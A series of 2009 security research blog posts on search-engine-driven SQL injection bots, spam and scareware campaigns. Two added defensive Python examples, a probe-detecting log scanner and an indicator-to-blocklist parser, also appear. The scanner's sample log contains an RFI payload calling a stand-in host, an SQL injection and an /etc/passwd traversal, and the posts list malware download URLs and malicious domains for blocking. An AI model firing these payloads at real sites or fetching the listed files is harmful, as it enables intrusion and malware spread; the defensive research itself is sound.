Wednesday, April 29, 2009

Massive SQL Injections Through Search Engine's Reconnaissance - Part Two

From the lone Chinese SQL injectors empowered with point'n'click tools for massive SQL injection attacks, to the much more efficient and automated botnet approach (courtesy of, for instance, the ASProx botnet), the process of automatically fetching URLs from public search engines in order to build hit lists to verify against remote file inclusion attacks and potential SQL injections remains a commodity feature in a great number of newly released malware bots.

In 2004, the Santy worm advertised the feature to the, back then, not so efficiently organized hordes of script kiddies. Due to its simplicity and huge potential for abuse, the concept of SQL injection through search engine reconnaissance has not only reached real-time syndication with the latest remotely exploitable web application vulnerabilities, but has also converged with remote file inclusion checks, local file inclusion checks, and IP-to-geolocation lookups in order to unethically "pen-test" a particular country, going beyond its designated domain extension.

A recently released malware bot is once again empowering the average script kiddie with the possibility to take advantage of the window of opportunity for each and every remotely exploitable web application flaw featured at Milworm, based on its real-time syndication of the exploits. Moreover, the IRC-based bot also features a console which allows manual exploitation or intelligence gathering against a particular site.

Some of the features include:
- Remote file inclusion
- Local file inclusion checks
- MySQL database details
- Extract all database names
- Data dumping from column and table
- Notification issued when Google bans the infected host for automatically using it

The commoditization of these features results in a situation where the window of opportunity for abusing a particular web application flaw is exploited much more efficiently, because reconnaissance data about its potential exploitability has already been crawled by a public search engine, often in real time.

The concept, as well as the features within the bot, is not rocket science; that's what makes it so easy to use.
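From the defender's side, the useful signal is not any single payload but one source working through a search-engine-built hit list against many different scripts on the same site. The following Python is an added example, not code from this post or from the bot it describes: it parses constructed combined-format access log lines, classifies each request for the remote file inclusion, local file inclusion and SQL injection probes mentioned above, and groups hits by client IP so that a mass scan stands out from a single curious request. The hostnames, IPs and the `own_host` parameter are assumptions for the example.

```python
"""Flag automated RFI / LFI / SQL injection probing in web server access logs.

Added example, not code from the original post or the bot it describes. It scans
combined-format access log lines for the probe types the post mentions (a remote
URL handed to a script parameter, directory traversal, SQL injection markers) and
groups hits by client IP: a search-engine-fed hit list shows up as one source
hammering many different scripts, which is a stronger signal than any single
payload. Every log line and hostname below is constructed for the example.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit, unquote

# Apache/nginx combined log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SQLI_RE = re.compile(
    r"union\s+(?:all\s+)?select|information_schema|'\s*or\s+1\s*=\s*1|load_file\s*\(|benchmark\s*\(",
    re.IGNORECASE,
)
LFI_RE = re.compile(r"\.\./|\.\.\\|/etc/passwd|/proc/self/environ", re.IGNORECASE)
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def classify_request(path: str, own_host: str) -> set:
    """Return the probe types ('rfi', 'lfi', 'sqli') seen in one request target."""
    findings = set()
    query = urlsplit(path).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        # RFI probe: a parameter that carries an absolute URL pointing off-host
        if REMOTE_URL_RE.match(value):
            target = (urlsplit(value).hostname or "").lower()
            if target and target != own_host.lower():
                findings.add("rfi")
    decoded = unquote(path)
    if LFI_RE.search(decoded):
        findings.add("lfi")
    if SQLI_RE.search(decoded):
        findings.add("sqli")
    return findings


def analyze_log(lines, own_host="www.example.test", min_distinct_paths=3):
    """Group probes by client IP and mark sources that hit several distinct scripts."""
    per_ip = defaultdict(lambda: {"hits": 0, "paths": set(), "types": set()})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than abort the sweep
        types = classify_request(m["path"], own_host)
        if not types:
            continue
        rec = per_ip[m["ip"]]
        rec["hits"] += 1
        rec["paths"].add(urlsplit(m["path"]).path)
        rec["types"] |= types
    return {
        ip: {
            "hits": r["hits"],
            "distinct_paths": len(r["paths"]),
            "types": sorted(r["types"]),
            "mass_scan": len(r["paths"]) >= min_distinct_paths,
        }
        for ip, r in per_ip.items()
    }


# Constructed sample: one scanner working through a hit list, one ordinary visitor
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Apr/2009:10:00:01 +0000] "GET /index.php?page=http://evil.example/shell.txt?? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [29/Apr/2009:10:00:02 +0000] "GET /modules/news.php?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [29/Apr/2009:10:00:03 +0000] "GET /gallery/view.php?file=../../../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [29/Apr/2009:10:00:04 +0000] "GET /index.php?page=http://www.example.test/about.html HTTP/1.1" 200 900 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [29/Apr/2009:10:01:00 +0000] "GET /search.php?q=sql+injection+news HTTP/1.1" 200 4096 "http://www.google.com/search?q=news" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, summary in analyze_log(SAMPLE_LOG).items():
        print(ip, summary)
```

The fourth sample line is the edge case worth keeping: a parameter that carries a URL back to the site itself is ordinary application behaviour, so only off-host URLs count as RFI probes. On a real log the `min_distinct_paths` threshold is the knob to tune; the point of grouping by source is that the hit-list scanner is recognizable by breadth, not by any one request.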

Related posts:
Massive SQL Injection Attacks - the Chinese Way
Yet Another Massive SQL Injection Spotted in the Wild
Obfuscating Fast-fluxed SQL Injected Domains
Smells Like a Copycat SQL Injection In the Wild
SQL Injecting Malicious Doorways to Serve Malware
SQL Injection Through Search Engines Reconnaissance
Stealing Sensitive Databases Online - the SQL Style
Fast-Fluxing SQL injection attacks executed from the Asprox botnet
Sony PlayStation's site SQL injected, redirecting to rogue security software
Redmond Magazine Successfully SQL Injected by Chinese Hacktivists

Tuesday, April 28, 2009

Spamvertised Swine Flu Domains

The people behind the ongoing swine flu spam campaign have either missed their marketing lectures, never attended any, or are simply too lazy -- their order processing does not even use SSL -- to fully exploit the marketing window opened by the viral outbreak: the majority of the spamvertised domains redirect to your typical Canadian Pharmacy scam instead of swine flu related templates.

Swine flu spamvertised domains:
lijgihab.cn; jihkohab.cn; litgukab.cn; namyalab.cn; waytipab.cn; ritlarab.cn; bersoxab.cn; xaqkabeb.cn; jamnibeb.cn; pahdeheb.cn; qeqyukeb.cn; qiwqoreb.cn; zajbaveb.cn; zacniyeb.cn; baqnubib.cn; zephecib.cn; texlocib.cn; fedpijib.cn; meysujib.cn; qoltujib.cn; mukwujib.cn; buljakib.cn; cutcurib.cn; bejdasib.cn; xikgosib.cn; bacnaxib.cn; kuskuzib.cn; juvyidob.cn; sowgugob.cn; buhbulob.cn; tonjotob.cn; kozgewob.cn; gasfexob.cn; pocdiyob.cn; kujroyob.cn; mirlacub.cn; kixqucub.cn; rovjudub.cn; jokrogub.cn; tusyajub.cn; gixxukub.cn; mospomub.cn; hixmipub.cn; zismerub.cn; cegfasub.cn; dimfevub.cn; qebhuvub.cn; duvlixub.cn; tiqceyub.cn; cogwibac.cn; minkucac.cn; dadwafac.cn; dilpogac.cn; jovsogac.cn; juwcolac.cn; wefmunac.cn; cexfopac.cn; wejpopac.cn; dovniqac.cn; mulsatac.cn; labwewac.cn; lirquwac.cn; latzoyac.cn; tuwbazac.cn; motjudec.cn; jicmefec.cn; qujqugec.cn; fajnahec.cn; wobfojec.cn; saybilec.cn; siyjoqec.cn; gehgixec.cn; gajdezec.cn; sgytubic.cn; cabfecic.cn; nedsicic.cn; xorpilic.cn; bulxopic.cn; kisniric.cn; beszesic.cn; hiwdosic.cn; linrudoc.cn; rijnakoc.cn; mahhekoc.cn; hahwikoc.cn; labniloc.cn; zocwoloc.cn; gommupoc.cn; yubbaqoc.cn; mefbuqoc.cn; xeclaroc.cn; qurburoc.cn; wupqatoc.cn; capjebuc.cn; wofmufuc.cn; boxxiguc.cn; zeffehuc.cn; pegvijuc.cn; bubkenuc.cn; fixfunuc.cn;

qivbiruc.cn; vahraxuc.cn; camxezuc.cn; tomyubad.cn; sohmifad.cn; sukgogad.cn; kossehad.cn; mopwijad.cn; pagtujad.cn; nohxokad.cn; pugvuqad.cn; bapvusad.cn; wekzetad.cn; lozfoyad.cn; vuppoyad.cn; forvafed.cn; cetcofed.cn; dadrofed.cn; sacvahed.cn; qoqgoled.cn; madwemed.cn; rilgeped.cn; voydewed.cn; liyxozed.cn; regmihid.cn; bujquhid.cn; damtuqid.cn; nifhosid.cn; dapfotid.cn; yofkibod.cn; roghudod.cn; gacpagod.cn; xijhihod.cn; japtikod.cn; meyrilod.cn; patjulod.cn; hixvunod.cn; towqotod.cn; ridnuxod.cn; vevteyod.cn; deqgobud.cn; lilnedud.cn; rusdehud.cn; zidpajud.cn; qibxenud.cn; xixvasud.cn; yapqitud.cn; xuldeyud.cn; nacyeyud.cn; ciknezud.cn; qiwsuzud.cn; leblidaf.cn; timpejaf.cn; vacxamaf.cn; nugnosaf.cn; xawpicef.cn; beqnahef.cn; kumhulef.cn; somnimef.cn; pejyunef.cn; zuwpikif.cn; bixvikif.cn; sajbipif.cn; vikqipif.cn; xotdaxif.cn; qalrezif.cn; xuhkudof.cn; lijsofof.cn; gimvufof.cn; kofgehof.cn; xixgikof.cn; percaqof.cn; nifjarof.cn; xivqirof.cn; rucmusof.cn; yizsatof.cn; qihqutof.cn; devqivof.cn; mijvaxof.cn; kiyvayof.cn; bubduyof.cn; pohfabuf.cn; zudsaduf.cn; tuhfehuf.cn; yaytumuf.cn; fumtinuf.cn; gibkesuf.cn; xaqqivuf.cn; wandawuf.cn; faqloyuf.cn; paqhizuf.cn; nowzacag.cn; xowjicag.cn; nolyodag.cn; tavyafag.cn; hujrulag.cn; sodbenag.cn; gafkiqag.cn; remqavag.cn

Happy blacklisting/cross-checking!

Related posts:
Inside an Affiliate Spam Program for Pharmaceuticals
Love is a Psychedelic, Too
Pharmaceutical Spammers Targeting LinkedIn
Fast-Flux Spam and Scams Increasing
Storm Worm Hosting Pharmaceutical Scams
Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings
Incentives Model for Pharmaceutical Scams

Wednesday, April 22, 2009

Massive Blackhat SEO Campaign Serving Scareware

Over the past couple of days, I've been monitoring yet another massive blackhat SEO campaign consisting of the typical hundreds of thousands of already crawled bogus pages serving scareware/fake security software.

Google later detected the campaign and removed all of the blackhat SEO farms from its index; at the time of assessment these amounted to close to a hundred domains, with hundreds of subdomains and thousands of pages within.

And although the abuse notifications for some of the central redirection domains proved effective, it took the cybercriminals approximately 24 hours to catch up and once again start hijacking search queries, combining scareware with pay-per-click redirections.

It's worth pointing out that this very latest campaign is directly related to last week's keyword hijacking blackhat SEO campaign, with both campaigns relying on identical redirection domains and serving the same malware. Who's behind these search engine poisoning attacks? A Ukrainian gang monetizing the hijacked traffic through the usual channels: scareware and reselling of the anticipated traffic.

The first stage of the campaign relied on mainstream media titles within its pages, such as USA News; BBC News; CNN News, as well as Hottest info!; HOT NEWS; Official Website and Official Site, thereby making it fairly easy to expose their portfolio of domains.

Interestingly, the cybercriminals appear to have detected the activity -- certain traffic management kits can log attempts at wandering around -- and removed the titles, which, combined with the typical referrer checking, made the campaign a bit more evasive:

var ref,i,is_se=0; var se = new Array("google.","msn.","yahoo.","comcast.","aol.","dead"); if(document.referrer)ref=document.referrer; else ref=""; for(i=0;i<5;i++

Once the user visits any of the domains within the portfolio, with a referrer check confirming they used a search engine to do so, two JavaScripts load: one dynamically redirects to the portfolio of fake security software, and the other logs the visit using a Ukrainian web site counter service (c.hit.ua/hit?i=6058&g=0&x=2&s=1&c=1&t=420&w=1024&h=768&d=24&0.5505934176708958&r=&u=http%3A//13news.hobby-site.com/counter.js).


The most recent list of domains on popular DNS services is as follows. Subdomains are excluded, since there are several hundred currently active per domain:
0kfzzl .us - 95.168.172.202 - Email: diannefostergcei@yahoo.com
52ubih .us - 95.168.172.198 - Email: joeminoryhjb@yahoo.com
5nw8b3 .us - 95.168.172.193 - Email: carolynfosteruwwi@yahoo.com
60mptk .us - 95.168.172.192 - Email: bernadettehockadayfedt@yahoo.com
6ry4nv .us - 95.168.172.191 - Email: markpackvesa@yahoo.com
77m8uh .us - 95.168.172.190 - Email: miguelbellhyes@yahoo.com
axnwpy .us - 95.168.172.204 - Email: hungsandfordoehx@yahoo.com
bumgli .us - Email: coobybrown3@gmail.com
cqxuhk .us - 95.168.172.203 - Email: michaelkoontzutae@yahoo.com
dfkghdf .us - 212.95.58.49 - Email: umora@live.com
dfwdowrly .us - Email: orest@hotmail.ru
edtbcm .us - 95.168.172.198 - Email: warrenskinnerumpi@yahoo.com
edu4life .us - Email: joh.n.ebrilo@gmail.com

fc4oih .us - 95.168.172.187 - Email: florencemclaughlinovpp@yahoo.com
fcbcwo .us - 89.149.216.146 - Email: dorisnaupkou@yahoo.com
fpq58z .us - 95.168.172.205 - Email: thomassoileautysz@yahoo.com
fzjt82 .us - 95.168.172.188 - Email: maryevansarpl@yahoo.com
gfor8g .us - Email: christopherdockinsptdg@yahoo.com
gotpig .us - Email: BeatriceJBrown@text2re.com
hhjsuuy .us - 217.20.117.198 - Email: jarovv@gmail.com
hk2april .us - 78.159.122.123 - Email: zainez@gmail.com
hk3april .us - 78.159.122.137 - Email: zainez@gmail.com
hno6sh .us - 89.149.238.12 - Email: alfredmeadenzcy@yahoo.com
i2u6nr .us - 95.168.172.202 - Email: jameshendricksxuwg@yahoo.com
ik3trends .us - 88.214.198.14 - Email: akililewis@gmail.com
itn92j .us - Email: nicholasmanoicdmg@yahoo.com
j4vre4 .us - Email: bettyfavorsiqzv@yahoo.com
kzq2i2 .us - 89.149.229.157 - Email: robertmitchellrswv@yahoo.com

l5ykp6 .us - 95.168.172.195 - Email: chrishuntpjzc@yahoo.com
lh85uk .us - 95.168.172.200 - Email: susannelsonggyp@yahoo.com
lp24april .us - 89.149.228.129 - Email: ramerod@gmail.com
m9nvzp .us - 89.149.216.50 - Email: jenniferduncanakcq@yahoo.com
mm00april .us - 212.95.55.115 - Email: brevno3@gmail.com
mm99april .us - 78.159.122.91 - Email: brevno3@gmail.com
n5y3m8 .us - 89.149.243.86 - Email: imogenegreenrqqr@yahoo.com
na8nw2 .us - 89.149.216.146 - Email: jeremyfitchcupl@yahoo.com
oag3h8 .us - 95.168.172.200 - Email: susanspidelesig@yahoo.com
po1april .us - 212.95.55.138 - Email: preadzz@gmail.com
po3april .us - 78.159.122.93 - Email: preadzz@gmail.com
pp6sqo .us - 95.168.172.197 - Email: connierobertsolni@yahoo.com
pr061r .us - 89.149.216.146 - Email: shirleywardauof@yahoo.com
qdhccy .us - Email: shark@nightmail.ru
qq338p .us - 89.149.221.36 - Email: debragonzalezyplu@yahoo.com

repszp .us - 89.149.221.36 - Email: christinamerrillzzhd@yahoo.com
rrgtnm .us - 95.168.172.203 - Email: josephelliskozc@yahoo.com
rt658y .us - 89.149.207.33 - Email: luannamcgeeiqwb@yahoo.com
rzi6rj .us - 95.168.172.189 - Email: leatriceporterlhbz@yahoo.com
scsrn8 .us - 95.168.172.201 - Email: donnabrownpgpa@yahoo.com
t9xu44 .us - 95.168.172.194 - Email: robertbissettezeub@yahoo.com
trfddp .us - 89.149.243.89 - Email: davidwilliamsqljt@yahoo.com
up3xv7 .us - Email: dennismontantecoco@yahoo.com
vecy5r .us - Email: merlynsmithsqxm@yahoo.com
vlj5jn .us - 95.168.172.196 - Email: angelostewartqfoq@yahoo.com
vr31qo .us - 95.168.172.199 - Email: christinearcherzhqz@yahoo.com
wk7iie .us - 95.168.172.204 - Email: jewellnakashimalgny@yahoo.com
x2ar3e .us - Email: bobbielopezeits@yahoo.com
xe24py .us - 89.149.243.138 - Email: johnbarberprfi@yahoo.com
xecuk8 .us - 95.168.172.194 - Email: lutheralfaronloz@yahoo.com
yl8ais .us - 89.149.216.147 - Email: meredithflackflub@yahoo.com
yqfvp4 .us - 78.159.96.84 - Email: julierussellnnro@yahoo.com
zvlewrms .us - Email: ygovoruhin@list.ru 
zxe11d .us - 95.168.172.195 - Email: christopherlewisxghb@yahoo.com
zy7itf .us - 89.149.207.244 - Email: cindyruizixqr@yahoo.com

13news.doesntexist .com
13news.hobby-site .com
17news.endofinternet .net
18news.homeftp .org
19news.blogdns .com
19news.dnsdojo .org
19news.gotdns .com
19news.kicks-ass .org
19news.servebbs .com
22news.blogdns .com
creditratingguide .hobby-site.com
disneyearrings .hobby-site.com
flatbellydiet .hobby-site.com
hydrangacutflowers .hobby-site.com
isa-geek .org
mxzsaw .hobby-site.com
mysteryterms .hobby-site.com

The rotated scareware/fake security software domains include scan-antispyware-4pc .com, parked at 195.88.81.93, the same portfolio of fake security software domains that I previously pointed out you could block in order to proactively protect your customers from blackhat SEO campaigns like this one:
pcvistaxpcodec .com
onlinevirus-scannerv2 .com
av-antispyware .com
scan-antispy-4pc .com
fastviruscleaner .com
securityhelpcenter .com
scan-antispy-4pc .com
scanner-work-av .com
scanner-antispy-av-files .com
adwarealert .com
proantispyware .com


Download locations/related fake codec redirections:
winpcdown10 .com (194.165.4.77)
suckitnow1 .com
winpcdown99 .com
loyaldown99 .com
codecxpvista .com
wincodecupdate .com
velzevuladmin .com

tubeloyaln .com
wedare.tubeloyaln .com
lamer.tubeloyaln .com
billingpayment.netcodecs.tubeloyaln .com
videosz.tubeloyaln .com

loyal-porno .com - the same domain was recently exposed in the same blackhat SEO campaign
win-pc-defender .com
codecvistaz .com
loyalvideoz .com

Sample detection rates:
litetubevideoz .net/codec/277.exe - detection rate
winpcdown99 .com/pcdef.exe - detection rate
winpcdown99 .com/file.exe - detection rate
setup.adwarealert .com/setupxv.exe - detection rate
files.scanner-antispy-av-files .com/exe/setup_200093_1_1.exe - detection rate

Monitoring of the campaign will continue.

Related posts:
Dissecting the Bogus LinkedIn Profiles Malware Campaign
Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software
Blackhat SEO Redirects to Malware and Rogue Software
The Invisible Blackhat SEO Campaign
Attack of the SEO Bots on the .EDU Domain
p0rn.gov - The Ongoing Blackhat SEO Operation
The Continuing .Gov Blackhat SEO Campaign
The Continuing .Gov Blackhat SEO Campaign - Part Two
Rogue RBN Software Pushed Through Blackhat SEO
Massive Blackhat SEO Targeting Blogspot
Blackhat SEO Campaign at The Millennium Challenge Corporation

Thursday, April 16, 2009

A CCDCOE Report on the Cyber Attacks Against Georgia

Following the coverage of my "Coordinated Russia vs Georgia cyber attack in progress" research in the Georgian government's official report "Russian Cyberwar on Georgia" (on page 4), I was very excited to find out that a report by NATO's Cooperative Cyber Defence Centre of Excellence entitled "Cyber Attacks Against Georgia: Legal Lessons Identified", authored by Eneken Tikk, Kadri Kaska, Kristel Rünnimeri, Mari Kert, Anna-Maria Talihärm and Liis Vihul, not only quotes me extensively but has also reproduced the entire research within the Annexes.

Looks great!

Recommended reading:
DDoS Attack Graphs from Russia vs Georgia's Cyberattacks
The Russia vs Georgia Cyber Attack
Pro-Israeli (Pseudo) Cyber Warriors Want your Bandwidth
People's Information Warfare Concept
Combating Unrestricted Warfare
The Cyber Storm II Cyber Exercise
Chinese Hacktivists Waging People's Information Warfare Against CNN
The DDoS Attacks Against CNN.com
China's Cyber Espionage Ambitions
North Korea's Cyber Warfare Unit 121
Chinese Hackers Attacking U.S Department of Defense Networks

A Diverse Portfolio of Fake Security Software - Part Nineteen

You know things are getting out of hand when the scareware ecosystem scales to the point where typosquatted scareware domains offer removal services for the very same scareware, distributed under multiple brands.

In response to the potential Conficker-ization of the scareware business, part nineteen of the Diverse Portfolio of Fake Security Software is the most massive update since the series started, and for a reason: to squeeze the cybercrime ecosystem and ruin the economies of scale behind its revenue generation.

Here are the most recent additions, with their associated registrant emails for clustering, cross-checking, and case building purposes:

vundofixtool .com (174.132.250.194)
remove-winpc-defender .com
remove-virus-melt .com
remove-ultra-antivir-2009 .com
remove-ultra-antivirus-2009 .com
remove-total-security .com
remove-system-guard .com
remove-spyware-protect-2009 .com
remove-spyware-protect .com
remove-spyware-guard .com
remove-personal-defender .com
remove-ms-antispyware .com
remove-malware-defender .com
remove-ie-security .com
remove-av360 .com
remove-antivirus-360 .com
remove-a360 .com
av360removaltool .com
antivirus360remover .com
remove-winpc-defender .com
remove-virus-melt .com
remove-virus-alarm .com
remove-ultra-antivirus-2009 .com
remove-ultra-antivir-2009 .com
remove-total-security .com


gotipscan .com (66.197.154.199) Robert Sampson Email: bausness@gmail.com
scanline6 .com
scanstep6 .com
scanbest6 .com
goscandata .com
goscanhigh .com
true6scan .com
any6scan .com
golitescan .com
gofanscan .com
gotipscan .com
gostarscan .com
goluxscan .com
goonlyscan .com
scan6step .com
goscanstep .com
scan6fast .com
scanline6 .info
scanlog6 .info
linescan6 .info
mainscan6 .info
log6scan .info
main6scan .info


addedantiviruslive .com (94.247.2.215) Administrative Email: werracruz99008@gmail.com
searchrizotto .com
easyaddedantivirus .com
yourcountedantivirus .com
av-plus-support .com
yourguardonline .cn
easydefenseonline .cn
bestprotectiononline .cn
yourguardstore .cn
examinepoisonstore .cn
freecoverstore .cn
myexaminevirusstore .cn
bestexaminedisease .cn
yourfriskdisease .cn
friskdiseaselive .cn
bestdefenselive .cn
bigprotectionlive .cn
bigcoverlive .cn
easyserviceprotection .cn
easypersonalprotection .cn
myascertainpoison .cn
yourguardpro .cn
refugepro .cn
mycheckdiseasepro .cn
yourcheckpoisonpro .cn
bigdefense2u .cn
newguard4u .cn
mydefense4u .cn
bestcover4u .cn


fullsecurityshield .com (209.44.126.14) Gregory Bershk Email: bershkapull@gmail.com
greatsecurityshield .com
trustsecurityshield .com
anytoplikedsite .com
topsecurityapp .com
inetsecuritycenter .com
securitytopagent .com
thebestsecurityspot .com
topsecurity4you .com
fullandtotalsecurity .com


extrantivirus .com (94.75.209.11)
rapid-antivir-2009 .com
rapid-antivir2009 .com
rapidantivirus2009 .com
rapidantivirus09 .com
rapidantivirus .com
ultraantivirus2009 .com
soft-traffic .com

seresult .com is a traffic management domain for the campaign (e.g. seresult .com/go.php?id=3466)

greatstabilitytraceonline .com (94.247.3.4) Jacquelyn Jain Email: jacquelynjjain@gmail.com
beststabilityscan .com
beststabilityscans .com
esnetscanonline .com
greatstabilitytraceonline .com
greatvirusscan .com
networkstabilitytrace .com
onlinestabilityscanada .com
protectionexamine .com
quickstabilityscan .com
safetyexamine .com
stabilityinetscan .com
stabilitysolutionslook .com
swiftsafetyexamine .com
webprotectionscan .com
webwidesecurity .com

scanmix4 .com (63.146.2.92) Clifford Barton Email: learnico@gmail.com
bestscan7 .com
goscandata .com
scan7live .com
new7scan .com
godatascan .com
gosidescan .com
goluxscan .com
goonlyscan .com
goscanstep .com
scantool4 .info
newscan4 .info
scannew4 .info
tool4scan .info


exstra-av-scanner .net (78.26.179.237) Joan Oglesby Email: extra.antivirus@gmail.com
msantivir-storage .com
ms-antivirus-storage .com
goodproantispyware .com
ms-antivir-scan .com
anispy-storage-ms .com
ms-av-storage-best .com
antivir-scanner-ms-av .com


msscan-files-antivir .com (195.88.81.93)
hot-girl-sex-tube .com
msscan-files-antivir .com
msscanner-top-av .com
msscanner-files-av .com
antivir-4pc-ms-av .com


ultraantivirus2009 .com (64.86.17.9)
virusalarmpro .com
vmfastscanner .com
mysuperviser .com
pay-virusdoctor .com
virusmelt .com
payvirusmelt .com
mysupervisor .net


msscanner-top-av .com (195.88.81.93)
msscanner-files-av .com
antivir-4pc-ms-av .com
hot-girl-sex-tube .com


antivirus-av-ms-check .com (78.26.179.131)
antivirus-av-ms-checker .com
ms-anti-vir-scan .com
mega-antiviral-ms .com


extremetube09 .com (94.247.2.7) Mariya Latinina Email: latinina40@gmail.com
softupdate09 .com
extrafastdownload .com
myrealtube .net

extraantivir .com (206.53.61.74)
no-as-scanner .com (195.88.81.37) Roy Latoya Email: latoysmith@gmail.com
pro-scanner-av-pc .com
tantispyware .com (65.110.60.123; 65.110.60.122)
webantispy .com
pantispyware09 .com

fastantivirus09 .com (94.75.209.74)

Blacklisting the scareware domains -- until the domains themselves get suspended -- proactively protects your customers from the "final output" of a huge percentage of attacks taking advantage of blackhat SEO, SQL injection, site compromise, malvertising, and the automatic abuse of Web 2.0 services through human-based CAPTCHA solving, such as Digg, LinkedIn, Bebo, Picasa and ImageShack, YouTube and Google Video.
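The registrant e-mails and hosting IPs listed above (and in the blackhat SEO post of April 22, and the semicolon-separated swine flu list of April 28) are there for clustering and cross-checking, and that is a mechanical job. The following Python is an added example, not code from these posts: it parses both layouts used on this page, refangs the "domain .tld" spacing, drops duplicate entries, groups domains by shared IP and registrant e-mail, and emits a DNS Response Policy Zone fragment for the blacklisting the paragraph recommends. All records in it are constructed; none is an indicator from the posts, and the function names are the example's own.

```python
"""Parse defanged indicator lists and cluster them by hosting IP and registrant email.

Added example, not code from the original posts. It handles the two layouts the
posts use: semicolon-separated domain dumps ("aaaa.cn; bbbb.cn; aaaa.cn") and one
record per line ("abc .us - 203.0.113.10 - Email: x@y"), refangs the "abc .us"
spacing, drops duplicates, groups domains that share an IP or a registrant
e-mail, and emits a DNS RPZ fragment for blocking. All records below are
constructed for the example; none is an indicator from the posts.
"""
import re
from collections import defaultdict

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# A domain, allowing the " ." / ". " defanging used in the posts between labels
DOMAIN_RE = re.compile(r"\b[a-z0-9-]+(?:\s?\.\s?[a-z0-9-]+)+\b", re.IGNORECASE)


def refang(token: str) -> str:
    """'abc .us' / 'abc. us' -> 'abc.us', lowercased."""
    return re.sub(r"\s*\.\s*", ".", token.strip()).lower()


def parse_domain_list(text: str) -> list:
    """Semicolon-separated dump -> ordered list with duplicates removed."""
    seen, out = set(), []
    for tok in text.split(";"):
        dom = refang(tok)
        if dom and "." in dom and dom not in seen:
            seen.add(dom)
            out.append(dom)
    return out


def parse_record(line: str) -> dict:
    """One 'domain - ip - Email: addr' line -> {domain, ips, email}; {} if no domain."""
    emails = [e.lower() for e in EMAIL_RE.findall(line)]
    rest = EMAIL_RE.sub(" ", line)       # strip e-mails first so 'yahoo.com' is not a hit
    ips = IPV4_RE.findall(rest)
    rest = IPV4_RE.sub(" ", rest)        # and IPs, which DOMAIN_RE would otherwise match
    domains = [refang(d) for d in DOMAIN_RE.findall(rest)]
    if not domains:
        return {}
    return {"domain": domains[0], "ips": ips, "email": emails[0] if emails else None}


def cluster_records(lines) -> dict:
    """Group parsed records by hosting IP and by registrant e-mail."""
    domains, by_ip, by_email = [], defaultdict(set), defaultdict(set)
    for line in lines:
        rec = parse_record(line)
        if not rec:
            continue
        if rec["domain"] not in domains:
            domains.append(rec["domain"])
        for ip in rec["ips"]:
            by_ip[ip].add(rec["domain"])
        if rec["email"]:
            by_email[rec["email"]].add(rec["domain"])
    return {
        "domains": domains,
        "by_ip": {ip: sorted(v) for ip, v in by_ip.items()},
        "by_email": {e: sorted(v) for e, v in by_email.items()},
    }


def to_rpz(domains) -> str:
    """Response Policy Zone records returning NXDOMAIN for each domain and its subdomains."""
    lines = []
    for d in domains:
        lines.append(f"{d} CNAME .")
        lines.append(f"*.{d} CNAME .")
    return "\n".join(lines) + "\n"


# Constructed sample input in the posts' layouts
SAMPLE_RECORDS = [
    "abc123 .us - 203.0.113.10 - Email: first@example.test",
    "def456 .us - 203.0.113.10 - Email: second@example.test",
    "ghi789 .us - Email: first@example.test",
    "scanfake1 .com (203.0.113.20) Jane Doe Email: third@example.test",
    "scanfake2 .com",
    "abc123 .us - 203.0.113.10 - Email: first@example.test",   # repeated line
    "13news.dyn-example .org",
]
SAMPLE_LIST = "aaaaaaab.cn; bbbbbbbb.cn;cccccccc.cn; aaaaaaab.cn; "

if __name__ == "__main__":
    clusters = cluster_records(SAMPLE_RECORDS)
    print(clusters["by_ip"])
    print(clusters["by_email"])
    print(to_rpz(clusters["domains"] + parse_domain_list(SAMPLE_LIST)))
```

The order of stripping matters: e-mail addresses and IPs are removed before the domain regex runs, otherwise the "yahoo.com" inside a registrant address or a dotted IP would be picked up as the indicator. The `*.domain` wildcard record is what makes the RPZ output useful against the "several hundred subdomains per domain" pattern described in the April 22 post.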

Related posts:
A Diverse Portfolio of Fake Security Software - Part Eighteen
A Diverse Portfolio of Fake Security Software - Part Seventeen
A Diverse Portfolio of Fake Security Software - Part Sixteen
A Diverse Portfolio of Fake Security Software - Part Fifteen
A Diverse Portfolio of Fake Security Software - Part Fourteen
A Diverse Portfolio of Fake Security Software - Part Thirteen
A Diverse Portfolio of Fake Security Software - Part Twelve
A Diverse Portfolio of Fake Security Software - Part Eleven
A Diverse Portfolio of Fake Security Software - Part Ten
A Diverse Portfolio of Fake Security Software - Part Nine
A Diverse Portfolio of Fake Security Software - Part Eight
A Diverse Portfolio of Fake Security Software - Part Seven
A Diverse Portfolio of Fake Security Software - Part Six
A Diverse Portfolio of Fake Security Software - Part Five
A Diverse Portfolio of Fake Security Software - Part Four
A Diverse Portfolio of Fake Security Software - Part Three
A Diverse Portfolio of Fake Security Software - Part Two
Diverse Portfolio of Fake Security Software

Wednesday, April 15, 2009

Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware

Not necessarily in real time (see Syndicating Google Trends Keywords for Blackhat SEO), but scareware/fake security software distributors quickly attempted to capitalize on the anticipated traffic related to this weekend's Twitter XSS worm, StalkDaily/Mikeyy.

What's particularly interesting about this campaign is not the fact that all of the currently active domains are operated by the same individual or group of individuals, nor that their blackhat SEO farms are growing to cover a much wider portfolio of keywords.

It's a tiny usa.js script (e.g. my1.dynalias .org/usa.js) hosted on all of the domains, which takes advantage of a simple evasive practice: referrer checking, in order to decide whether or not to serve the malicious content.

